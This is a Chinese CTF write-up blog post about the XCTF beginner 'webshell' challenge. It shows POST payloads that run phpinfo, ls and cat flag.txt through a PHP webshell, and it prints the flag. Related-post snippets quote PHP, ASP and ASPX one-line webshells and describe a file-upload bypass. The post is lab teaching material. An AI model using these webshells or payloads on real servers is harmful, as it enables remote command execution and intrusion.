20220129--CTF WEB方向刷题-- WP--非常简单的webshell题

最新推荐文章于 2023-01-03 22:51:54 发布
最新推荐文章于 2023-01-03 22:51:54 发布
阅读量600 收藏 2
点赞数
分类专栏: CTF刷题 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51550750/article/details/122748512
版权

CTF—攻防世界–新手场–webshell

攻防世界官网:https://adworld.xctf.org.cn/

更多CTF刷题平台汇总:
https://blog.csdn.net/qq_51550750/article/details/122748075

在这里插入图片描述

在这里插入图片描述

已经得知是POST请求且传参就是shell:
首先试试行不行:

shell=phpinfo();

在这里插入图片描述
成功:
在这里插入图片描述
再尝试系统命令:

shell=system("ls");

在这里插入图片描述

得到目录:
在这里插入图片描述
即:
在这里插入图片描述
然后读取flag.txt

shell=system("cat flag.txt");

最后得到flag:
在这里插入图片描述

cyberpeace{d90d7967bf055ef29131f36804424479}

qq_51550750
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界web新手区总结
cherish的技术博
04-20 329
目录前言backupsimple_phpxff_refererget_postsimple_js 前言 我还是太菜了,这篇就放一些查了writeup的 攻防世界网址:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1 backup 基础知识: 常见的备份文件后缀名有: .gi...
攻防世界新手WEB
weixin_44512852的博客
09-23 1230
新手web cookie 网址:http://111.200.241.244:60981/ 目是cookie,可以在网页按F12进入控制器,在运行一次找到对于ip查看消息头中cookie的信息 这里可以看到在请求和响应消息头中cookie的name-value是look-here:cookie.php,所以看看cookie.php看看 图中可以看到,给了提示"See the http response"然后继续在控制台中查看response的内容,没有找到需要的内容,试一下用burpsuite抓取然后
ctf(一):攻防世界
天威一号
10-27 564
网址:https://adworld.xctf.org.cn/ 1、post传参 2、get传参直接在后面加 ?id=1 3、robots.txt 文件。 直接在网址后面加 robots.txt 就会显示后台文件; 4、index.php 后缀是.php的文档备份格式: index.php 备份后: index.php.bak 5、cookie 在f12中找储存中就会显示cookie选项,...
攻防世界-Web(新手区)
qwzf
07-17 2万+
前言 暑假前,为了学习Web,做了攻防世界的新手区的Web,当时没有总结,现在总结一下。 正文 Web1:view_source 查看源代码,右键不可以用。所以按F12,直接查看源码即可。 Web2:get_post HTTP的两种请求方式 GET GET请求的数据会附在URL之后(就是把数据放置在HTTP协议头中)如: /test/1.php?name1=value1&name...
CTF竞赛介绍及刷题网址更新---2020.08
第七宇林的博客
08-15 1万+
CTF(夺旗赛) ---网络安全技术比赛的介绍 及 CTF常用的在线刷题网站:RedTigers-Hackit、XCTF(攻防世界)竞赛平台、网络信息安全攻防学习平台、OWASP 中国、实验吧CTF训练营、全国大学生信息安全竞赛官方网站、MS09067WEB靶场、合天网安实验室、封神台、SQL Fiddle、 BUUCTFCTFHUB...
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-MISC关于各类编码习(湖工商扛把子)
最新发布
03-17
MISC章节关于各类编码的练习
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
攻防世界001-Banmabanma
weixin_45128912的博客
01-03 802
攻防世界001-Banmabanma
20220129--CTF刷题-- WEB方向--get_post--- GET方法和POST方法结合的简单
qq_51550750的博客
01-29 251
攻防世界-- WEB方向–新手场–第七–get_post 攻防世界的网址:https://adworld.xctf.org.cn/ 更多CTF刷题网站可以参考博客:(刷题网站和自己可以搭建的网站汇总) https://blog.csdn.net/qq_51550750/article/details/122748075 ?a=1 POST DATA打勾: 最后得到flag:cyberpeace{52a0a30288f0b6af8b5e0f0d8bb5923b} ...
攻防世界MISCall
一颗小白菜的博客
04-02 1852
攻防世界MISCall 1、目 网址:攻防世界 2、原理及工具 原理:git信息泄露 git官网资料:https://www.git-scm.com/book/zh/v2 工具:kali、python 3、解过程 下载下来的文件名字太长,先改个名字 root@kali:~/Desktop/CTF# mv d02f31b893164d56b7a8e5edb47d9be5 miscall roo...
攻防世界 Morse
LEIDAqix的博客
12-21 3718
攻防世界 Morse 下载附件 11 111 010 000 0 1010 111 100 0 00 000 000 111 00 10 1 0 010 0 000 1 00 10 110 (看构成仅有0,1,可能为摩斯密码,或者转为ascii,又看到0,1分布有空格隔开,且没有规律,判定为摩斯密码) 摩斯密码的解法: (将1-为将0为.,或者互换,去在线转换网址查看) 网址: 在线转换 同理也...
BugkuCTFweb之求getshell
A_dmin的博客
12-09 2989
BugkuCTFweb之求getshell 一进来发现: maybe时绕过,那就用一句话木马吧!! php的一句话是:<?php @eval($_POST['pass']);?> asp的一句话是:<%eval request ("pass")%> aspx的一句话是:<%@ Page Language="Jscript&amp
CTF-web
qq_42936836的博客
08-24 5325
记录的一些CTFweb目~~~
攻防世界-Crypto-说我作弊需要证据(RSA解密+校验py脚本)-ISCC2017
Sea_Sand息禅
04-15 4401
1、说我作弊需要证据 给了一个数据包,打开追踪流发现信息,大量的base64码: 解码几行得到: SEQ = 13; DATA = 0x3b04b26a0adada2f67326bb0c5d6L; SIG = 0x2e5ab24f9dc21df406a87de0b3b4L; SEQ = 0; DATA = 0x7492f4ec9001202dcb569df468b4L; SIG = 0x...
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
推荐大家一些CTF的网站和工具
HackerYY的博客
12-07 6594
CTF工具和网站简介 内有解析
ctfhub 全部WP
09-22
引用:MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。 它是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类。 常见的MME类型,例如:   超文本标记语言文本 .html,html text/htm   普通文本 .txt text/plain   RTF文本 .rtf application/rtf   GIF图形 .gif image/gif   JPEG图形 .jpg image/jpeg 上传包含一句话木马的php文件,然后使用burp抓包,修改数据包的content type为image/gif(注意是第二个content type)发送到repeater修改后,点击send,然后放包,即可显示上传php文件成功后的相对路径。使用蚁剑连接该一句话木马即可获得flag。 文件头检查 。 引用: htaccess 查看网页源码,可以看到常用的文件后缀都被禁用。根据目的提示,.hatccess文件【.htaccess是Apache服务器的一个配置文件。它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】 前提:mod_rewrite模块开启,配置文件中LoadMoudle rewrite_module module modules/mod_rewrite.so AllowOverride All,配置文件中AllowOverride All (如果可能做过程中结果出现问,但步骤正确,可以看看前提是否正确) 。 引用:文件头检验 是当浏览器在上传文件到服务器的时候,服务器对所上传文件的Content-Type类型进行检测。如果是白名单允许的,则可以正常上传,否则上传失败。 当我们尝试上传一句话木马的php文件,出现了正确后缀类型的弹窗。使用010editor制作一张图片木马,上传时使用burp抓包把文件后缀改为php,然后点击send。使用蚁剑连接php文件,即可在对应目录下找到flag。 00截断 。 关于ctfhub的全部WP,很抱歉我无法提供相关信息。由于ctfhub是一个综合性的CTF平台,涵盖了大量的目和解思路,每个目的WP都有着不同的内容和解法。如果您对特定的目或解方法感兴趣,我可以为您提供更多信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值